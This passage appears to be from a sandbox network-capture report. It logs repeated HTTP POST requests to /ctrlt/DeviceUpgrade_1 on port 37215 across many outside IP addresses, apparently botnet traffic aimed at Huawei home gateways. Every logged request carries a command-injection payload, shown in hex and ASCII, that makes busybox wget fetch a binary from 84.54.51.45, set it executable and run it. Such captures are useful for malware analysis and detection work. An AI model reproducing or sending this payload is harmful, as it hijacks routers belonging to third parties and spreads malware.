                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1607192.168.2.154939241.240.36.4837215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:13.109224081 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1608192.168.2.153936441.170.31.15637215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:13.109224081 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1609192.168.2.154855841.114.216.20437215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:13.109278917 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1610192.168.2.155255441.97.63.14137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:13.109282017 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1611192.168.2.153606841.136.125.2937215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:13.109282017 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1612192.168.2.155911841.126.150.19737215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:13.109313011 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1613192.168.2.155146641.20.65.3537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:13.109313011 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1614192.168.2.153327841.117.196.13037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:13.109354973 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1615192.168.2.155657841.88.162.11737215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:13.109363079 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1616192.168.2.155373441.140.47.8937215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:13.109368086 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
